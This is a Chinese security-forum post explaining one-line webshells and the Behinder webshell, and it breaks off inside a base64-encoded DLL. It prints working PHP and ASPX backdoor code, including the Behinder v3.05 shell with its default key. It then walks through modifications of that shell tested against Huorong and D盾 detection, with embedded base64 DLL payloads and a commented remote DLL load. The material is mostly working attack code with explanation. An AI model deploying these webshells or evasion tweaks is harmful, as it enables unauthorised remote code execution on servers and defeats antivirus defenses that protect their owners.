安全矩阵

 找回密码
 立即注册
搜索
查看: 3883|回复: 0

一句话木马到冰蝎webshell魔改之.Net篇幅 

[复制链接]

114

主题

158

帖子

640

积分

高级会员

Rank: 4

积分
640
发表于 2021-6-11 22:50:29 | 显示全部楼层 |阅读模式
本帖最后由 Xor0ne 于 2021-6-11 23:00 编辑

一句话木马到冰蝎webshell魔改之.Net篇幅

本文首发于看雪:
链接如下:https://bbs.pediy.com/thread-267935.htm


2021-6-2 22:31  




目录


在对冰蝎webshell进行魔改之前,我们先去看看一句话木马的基本结构吧!


0x01 PHP

1.菜刀基础一句话

aspx的有些东西暂时有点懵,所以就先从php试试吧!php常见的一句话如下;
1
<?php @eval($_POST['pass']);?>

我们利用wireshark抓包查看请求的流量包,如下所示:



如上图,我们可以发现,菜刀的请求包过程可以分解为如下步骤:

(1)将需要执行的命令进行base64编码,赋值给z0;
(2)将z0作为参数通过post传递,然后利用$_POST[z0]接受传递的命令;
(3)@eval执行$_POST[z0]接收到的命令,并将执行结果赋值给pass。
(4)一句话木马中的 @eval($_POST['pass']);执行上述命令并展现出结果。


这里可能有点奇怪,为什么是执行上述命令呢?上面我们不是已经执行处结果了吗?其实上述的命令都是我们倒推的结果,因此从前往后来看他只是一串字符串而已,需要通过eval/assert等函数执行上述字符串才会产生上述结果,因此最后在一句话木马中我们还需要一个eval执行命令。


这么套娃,为什么要反复的进行base64编码和解码而不直接执行命令呢?
度娘建议说可能是考虑到特殊字符容易出问题或者不符合rfc协议之类的原因。

如下图,我们可以将上面反复套娃的过程转化为@eval($_POST[@eval($_POST[z0])]) ,而z0就是我们需要传入的命令参数。



下面可以将上面抓取到的菜刀的流量进行base64解码,查看一下z0的具体的内容,如下所示:


1
2
3
4
5
6
7
8
9
10
11
12
13
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");;
$D=dirname($_SERVER["SCRIPT_FILENAME"]);
echo $D."\t";
if(substr($D,0,1)!="/"){
    foreach(range("A","Z") as $L)
        if(is_dir($L.":"))
            echo($L.":");
};
echo("|<-");
die();


z0的内容主要是通过循环遍历某个路径下的文件。我们可以参数尝试将z0换成phpinfo();的base64编码格式,也是可以执行成功的。




2.冰蝎v2.0


其实防御者之所以能不停的去更新自己的规则,主要是因为两个原因:
  • 1.攻击者发送的请求都是脚本源代码,无论怎么样编码,仍然是服务器端解析引擎可以解析的源代码,是基于文本的,防御者能看懂。
  • 2.攻击者执行多次相同的操作,发送的请求数据也是相同的,防御者就可以把他看懂的请求找出特征固化为规则。


试想一下,如果攻击者发送的请求不是文本格式的源代码,而是编译之后的字节码(比如java环境下直接向服务器端发送class二进制文件),字节码是一堆二进制数据流,不存在参数;攻击者把二进制字节码进行加密,防御者看到的就是一堆加了密的二进制数据流;攻击者多次执行同样的操作,采用不同的密钥加密,即使是同样的payload,防御者看到的请求数据也不一样,这样防御者便无法通过流量分析来提取规则。


SO,这就是我们可以一劳永逸绕过waf的思路,具体流程如下:


  • 1.首次连接一句话服务端时,客户端首先向服务器端发起一个GET请求,服务器端随机产生一个128位的密钥,把密钥回显给客户端,同时把密钥写进服务器侧的Session中。客户端获取密钥后,对本地的二进制payload先进行AES加密,再通过POST方式发送至服务器端。
  • 2.服务器收到数据后,从Session中取出秘钥,进行AES解密,解密之后得到二进制payload数据。
  • 3.服务器解析二进制payload文件,执行任意代码,并将执行结果加密返回。
  • 4.客户端解密服务器端返回的结果。


冰蝎执行的流程大致如下:



下面,我们分析一下流量查看一下它的具体过程:

如下图,我们可以发现,进行了get请求服务器端,然后服务器端返回了一个随机的128位密钥。(PS:多次试验均发现他请求了两次服务器端,原因尚且不明)


Get请求获取到服务器端返回的密钥后,客户端之后则发送AES加密后的数据流。


服务器端接收到POST请求后,从session中取出密钥,然后解密执行POST请求,并将执行结果返回至客户端。


服务器端与客户端的大致过程我们已经了解,接下来我们可以尝试理解一下behinder的php后门文件代码(即服务器端):


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<?php
@error_reporting(0);
session_start();
if (isset($_GET['pass'])) //get请求
{
    $key=substr(md5(uniqid(rand())),16); //生成128随机密钥
    $_SESSION['k']=$key; //将密钥存放在session中
    print $key; //在客户段打印出密钥
}
else //POST请求过程
{
    $key=$_SESSION['k'];
    $post=file_get_contents("php://input");
    if(!extension_loaded('openssl'))
    {
        $t="base64_"."decode";
        $post=$t($post."");

        for($i=0;$i<strlen($post);$i++) {
                 $post[$i] = $post[$i]^$key[$i+1&15];
                }
    }
    else
    {
        $post=openssl_decrypt($post, "AES128", $key);
    }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{public function __construct($p) {eval($p."");}}
    @new C($params);
}
?>


0x02 aspx

aspx的一句话如下:

1
2
<%@ Page Language="Jscript"%>
<%eval(Request.Item["value"])%>

由于前面我们已经对php版本的一句话流程进行了大致的女分析,aspx的话我们就不进行叙述啦!

1.冰蝎v2.0

1.1.原理分析

通过上面对冰蝎2.0的php马的过程的理解,下面我们尝试理解一下冰蝎2.0的aspx马的执行过程。aspx马代码如下:

1
2
3
4
5
6
7
8
9
10
11
<%@ Page Language="C#" %>
<%
    if (Request["pass"]!=null)
    {
        Session.Add("key", Guid.NewGuid().ToString().Replace("-", "").Substring(16)); Response.Write(Session[0]); return;
    }   
    byte[] key = Encoding.Default.GetBytes(Session[0] + "");
    byte[] content = Request.BinaryRead(Request.ContentLength);
    byte[] decryptContent = new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(key, key).TransformFinalBlock(content, 0, content.Length);
    System.Reflection.Assembly.Load(decryptContent).CreateInstance("Payload").Equals(this);
%>


首先检测请求方式,如果是带了密码字段的GET请求,则随机产生一个128位的密钥,并将密钥写进Session中,然后通过response发送给客户端,代码如下:

1
2
3
4
if (Request["pass"]!=null)
{
    Session.Add("key", Guid.NewGuid().ToString().Replace("-", "").Substring(16)); Response.Write(Session[0]); return;
}

当客户端请求方式为POST时,服务器先从request中取出加密过的二进制数据(base64格式),代码如下:

1
2
3
4
byte[] key = Encoding.Default.GetBytes(Session[0] + ""); //从session中获取密钥
byte[] content = Request.BinaryRead(Request.ContentLength); //获取请求的二进制数据流
byte[] decryptContent = new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(key, key).TransformFinalBlock(content, 0, content.Length); //利用密钥将二进制数据流解密
System.Reflection.Assembly.Load(decryptContent).CreateInstance("Payload").Equals(""); //解密后的数据流为一个dll加密后的文件,然后我们加载dll,创建一个payload实例,并调用Equals方法


拓展分析:
  • System.Security.Cryptography:包含这些与加密、签名相关的类库。包括对称加密和非对称加密算法,这里的System.Security.Cryptography.Rijndael与RijndaelManaged主要是AES/Rijndael对称加密算法。
  • CreateDecryptor()使用当前的密钥和初始化向量 (IV) 创建对称 AES 解密器对象。
  • TransformFinalBlock(content, 偏移量, content_count):转换最终数据块,可将指定字节数组的指定区域转换为 Base 64。


最终的话,我们还是调用了payload中的Equals方法,那么这个Equals是什么呢?

Equals本质上是我们重写的一个类方法。重写??为什么不是自定义而是重写呢??那是因为Object类中本来就存在这个方法啊,因此当我们在继承Object类的子类中写入这个方法的时候就会对这个方法进行重写了!说起以来可能有点绕,我们以一个简单地理解来分解一下这个过程吧!

测试payload.cs实现的就是简单地弹出计算器的公共,代码如下:


1
2
3
4
5
6
7
8
9
10
11
12
13
14
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Diagnostics;

public class Payload
{
    public override bool Equals(Object obj)
    {
        Process.Start("calc.exe");
        return true;
    }
}

把这个类编译成dll文件,并将该文件做一下Base64编码,然后可用C#程序集加载该dll并实例化生成一个Payload类且调用该方法。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;

namespace ConsoleApplication1
{
    class Program
    {
        public static void Main()
        {
            string Payload="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";
            Assembly myAssebly=System.Reflection.Assembly.Load(Convert.FromBase64String(Payload));
            Object myPaylaod = myAssebly.CreateInstance("Payload");
            myPaylaod.Equals("");
        }
    }
}


除了以上方法加载外,我们还可以加载dll文件或者远程加载dll执行。

1
2
3
4
5
6
7
string path = @"D:\Program Files (x86)\Microsoft Visual Studio\MyProjects\payload\Payload\Payload\bin\Debug\Payload.dll";
//绝对路径加载
Assembly myAssebly = System.Reflection.Assembly.LoadFile(path);
//远程加载--失败
//Assembly myAssebly = System.Reflection.Assembly.LoadFrom("http://192.168.10.21:8088/Payload.dll");
Object myPaylaod = myAssebly.CreateInstance("Payload.Class1"); //Payload的类名作为参数传递,得到Payload类的实例myPayload。
myPaylaod.Equals("");//myPaylaod调用重写的Equals方法


运行结果:



重写Equals函数调用计算器成功,那么我们为什么要重写Equals方法呢?重写一个其他方法行不行呢??


Equals函数来自于终极基类Object,即每一个类都默认继承于Object,且具有Object类的相关属性和方法,Object的方法主要有四个。




上面4个方法其中Equals、ToString、GetHashCode这三个方法是虚方法,可重写GetType是外部方法,

具体介绍参见:https://www.cnblogs.com/GreenLeaves/p/7479412.html

behinder选中的是Equals方法,那么其他方法可以吗?如下,我们可以看一下他们的虚方法定义。PS:注意看返回值类型和参数类型,这些是我们重写方法时所不能改变的。




Equals方法可以传入一个object对象,其他虚方法均无法传入参数值,而我们在进行木马连接的时候需要传入密钥key和内容content,因此在这我们只能选用Equals方法作为我们的调用方法。(PS:如果不需要传入参数啥的,我们可以尝试重写另外三个方法哦!)

上面我们是重写的是Equals方法,在Equals方法中执行调用计算器的指令。其实除了简单地调用计算器外,我们还可以执行一些恶意代码,冰蝎便是利用此原理,自定义一个类U,然后在类U中重写Equals方法,通过Equals执行满足恶意代码。



1.2.流量分析


原理方面大致讲解完毕,下面我们可以查看冰蝎3.0的流量去验证冰蝎2.0的传递过程。
首先是对服务器进行两次Get请求,然后服务器给客户端返回密钥。




客户端获取密钥后,即利用密钥将dll进行AES加密,再进行POST请求,发送dll。服务器端接收到AES加密流后,从session中取出密钥对AES流进行解密执行,调用Equals方法执行。





2.冰蝎3.0魔改

冰蝎2.0基本讲解完毕,顺带看一下冰蝎3.05有什么不一样吧!



上图,可以发现冰蝎v2.0和冰蝎3.05版本其实相差不大,原理都是利用反射装载传入的dll文件流(且dll中的类名总是u,然后在U中对Equals方法进行重写),不同的是v2.0的密钥是随机生成的,而v3.05里面的密钥是用户定义好的。

由于在原理上冰蝎2.0和3.05相差不大,因此原理方面我们再次不再赘述。冰蝎的马在现在各大厂基本上都无法绕过,在此我们主要是尝试对冰蝎的木马进行修改以绕过相关的杀软。

PS::以下主要是一些思路的分享,仅供参考,读者可自行拓宽思路哦,欢迎交流探讨啦!




2.1.基本变换--逃避静态特征码


基本变换主要是对原来的代码进行拆分(即长句变断句)、替换(常量、变量、截取等方法)。主要还是规避一些特征码的检测。
以冰蝎v3.05版本为例,原生的aspx已被各大厂商收录特征库了。


1
<%@ Page Language="C#" %><%@Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b"); /*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>




(1)换行拆分

原生的将所有代码都合并为一句话了,我们可以尝试换行拆分一下。

1
2
3
4
5
6
7
<%@ Page Language="C#" %>
<%@Import Namespace="System.Reflection"%>
<%
Session.Add("k","e45e329feb5d925b"); /*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/
byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);
Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);
%>

变换一下,火绒的查杀已过,D盾未变。




(2)长句化短

原生的aspx基本上只有三句代码,我们可以尝试将一些比较长的代码变短。如下;

1
2
3
4
5
6
7
8
9
10
<%@ Page Language="C#" %>
<%@Import Namespace="System.Reflection"%>
<%@Import Namespace="System.Security.Cryptography"%>
<%
    Session.Add("k","e45e329feb5d925b"); /*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/
    byte[] k = Encoding.Default.GetBytes(Session[0] + ""), c = Request.BinaryRead(Request.ContentLength);
    RijndaelManaged rm = new RijndaelManaged();
    byte[] xx  = rm.CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length);
    Assembly.Load(xx).CreateInstance("U").Equals(this);
%>

​​


再次细分。shell01.aspx

1
2
3
4
5
6
7
8
9
10
11
<%@ Page Language="C#" %>
<%@Import Namespace="System.Reflection"%>
<%@Import Namespace="System.Security.Cryptography"%>
<%
    Session.Add("k","e45e329feb5d925b"); /*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/
    byte[] k = Encoding.Default.GetBytes(Session[0] + ""), c = Request.BinaryRead(Request.ContentLength);
    RijndaelManaged rm = new RijndaelManaged();
    ICryptoTransform it = rm.CreateDecryptor(k, k);
    byte[] xx  = it.TransformFinalBlock(c, 0, c.Length);
    Assembly.Load(xx).CreateInstance("U").Equals(this);
%>




(3)字符串拼接执行

我们逐句注释,查看D盾查杀的特征是什么,发现特征为建立对称的AES 加密子物件,个人理解为创建解密器。将其注释掉之后即不被查杀,未被注释时则被查杀。shell02.aspx

1
ICryptoTransform it = rm.CreateDecryptor(k, k);



本意是想利用类似于PHP,对特征码进行拼接,然后一个完整的函数名称,但是在查找相关资料的时候发现C#似乎不像php里面有一个eval函数可以执行对拼接完成的函数,因此我们只能自己尝试重写一个类似于eval的函数,然后调用执行它。(额,能力不大够,暂且放一个大佬连接吧,希望看懂的大佬带带弟弟!)


参考链接:

C#实现将字符串转换成代码并执行:



(4)自定义替换函数

重写AES加密的库函数。额,,能力有限,待定。


2.2.dll加载--逃避流量检测

(1)特征执行写入dll

上面我们讲到D盾主要是对创建解密器的地方会进行查杀,因此我们可以将创建解密器的地方写入到dll中,后期加载dll的时候调用即可。(PS代码基本写完了,但是运行会报错,,改不动,希望有方法的大佬带带弟弟!)

Payload01类如下:


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
using System;
using System.Collections.Generic;
using System.Linq;
using System.Reflection;
using System.Security.Cryptography;
using System.Text;

namespace payload01
{
    public class Class1
    {
        public ICryptoTransform test(byte[] k)
        {
            RijndaelManaged rm = new RijndaelManaged();
            ICryptoTransform it = rm.CreateDecryptor(k, k);
            return it;
        }
    }
}

将类编译成dll,并进行base64加密,然后再aspx调用执行。shell03.aspx

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<%@ Page Language="C#" %>
<%@Import Namespace="System.Reflection"%>
<%@Import Namespace="System.Security.Cryptography"%>
<%
    Session.Add("k","e45e329feb5d925b"); /*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/
    byte[] k = Encoding.Default.GetBytes(Session[0] + ""), c = Request.BinaryRead(Request.ContentLength);
    RijndaelManaged rm = new RijndaelManaged();
    //ICryptoTransform it = rm.CreateDecryptor(k, k);
    string dll =
"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKddkmAAAAAAAAAAAOAAIiALATAAAAoAAAAGAAAAAAAAJigAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAANQnAABPAAAAAEAAAHgDAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAACcJgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAALAgAAAAgAAAACgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAHgDAAAAQAAAAAQAAAAMAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAEAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAIKAAAAAAAAEgAAAACAAUAfCAAACAGAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwAwAWAAAAAQAAEQBzDwAACgoGAwNvEAAACgsHDCsACCoiAigRAAAKACoAQlNKQgEAAQAAAAAADAAAAHY0LjAuMzAzMTkAAAAABQBsAAAA5AEAACN+AABQAgAAoAIAACNTdHJpbmdzAAAAAPAEAAAEAAAAI1VTAPQEAAAQAAAAI0dVSUQAAAAEBQAAHAEAACNCbG9iAAAAAAAAAAIAAAFHFQIACQAAAAD6ATMAFgAAAQAAABMAAAACAAAAAgAAAAEAAAARAAAADgAAAAEAAAABAAAAAQAAAAAAtQEBAAAAAAAGAA4BSAIGAHsBSAIGAEIAFgIPAGgCAAAGAGoA7gEGAPEA7gEGANIA7gEGAGIB7gEGAC4B7gEGAEcB7gEGAIEA7gEGAFYAKQIGADQAKQIGALUA7gEGAJwAmQEGAHcCwwEGAN0BgwIGACQAgwIGAMoBgwIAAAAAEgAAAAAAAQABAAEAEAALAAEAQQABAAEAUCAAAAAAhgB+AjUAAQByIAAAAACGGAACBgACAAAAAQCzAQkAAAIBABEAAAIGABkAAAIKACkAAAIQADEAAAIQADkAAAIQAEEAAAIQAEkAAAIQAFEAAAIQAFkAAAIQAGEAAAIVAGkAAAIQAHEAAAIQAHkAAAIQAJEAAAIGAJkABgIjAIEAAAIGAC4ACwA8AC4AEwBFAC4AGwBkAC4AIwBtAC4AKwB8AC4AMwB8AC4AOwB8AC4AQwBtAC4ASwCCAC4AUwB8AC4AWwB8AC4AYwCaAC4AawDEAC4AcwDRABoABIAAAAEAAAAAAAAAAAAAAAAAAQAAAAQAAAAAAAAAAAAAACwAGwAAAAAAAAAAAABwYXlsb2FkMDEAQ2xhc3MxADxNb2R1bGU+AG1zY29ybGliAFJpam5kYWVsTWFuYWdlZABHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAGsAcGF5bG9hZDAxLmRsbABTeXN0ZW0AU3ltbWV0cmljQWxnb3JpdGhtAElDcnlwdG9UcmFuc2Zvcm0AU3lzdGVtLlJlZmxlY3Rpb24ALmN0b3IAQ3JlYXRlRGVjcnlwdG9yAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBPYmplY3QAdGVzdABTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5AAAAAACYjm2n/YDwRa4upxUZlGC7AAQgAQEIAyAAAQUgAQEREQQgAQEOBCABAQIIBwMSSRJFEkUIIAISRR0FHQUIt3pcVhk04IkGIAESRR0FCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAcBAAAAAA4BAAlwYXlsb2FkMDEAAAUBAAAAABcBABJDb3B5cmlnaHQgwqkgIDIwMjEAACkBACQ5MDgwZDk1My0yOTEwLTRiNWItYmJmOC00MWU2Y2UyYWY5MzAAAAwBAAcxLjAuMC4wAABHAQAaLk5FVEZyYW1ld29yayxWZXJzaW9uPXY0LjABAFQOFEZyYW1ld29ya0Rpc3BsYXlOYW1lEC5ORVQgRnJhbWV3b3JrIDQAAAAAAAAAqF2SYAAAAAACAAAAHAEAALgmAAC4CAAAUlNEUwSNkRrXWGZHvr19je5Kdd8BAAAARDpcUHJvZ3JhbSBGaWxlcyAoeDg2KVxNaWNyb3NvZnQgVmlzdWFsIFN0dWRpb1xNeVByb2plY3RzXHBheWxvYWRccGF5bG9hZDAxXHBheWxvYWQwMVxvYmpcRGVidWdccGF5bG9hZDAxLnBkYgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD8JwAAAAAAAAAAAAAWKAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCgAAAAAAAAAAAAAAABfQ29yRGxsTWFpbgBtc2Nvcm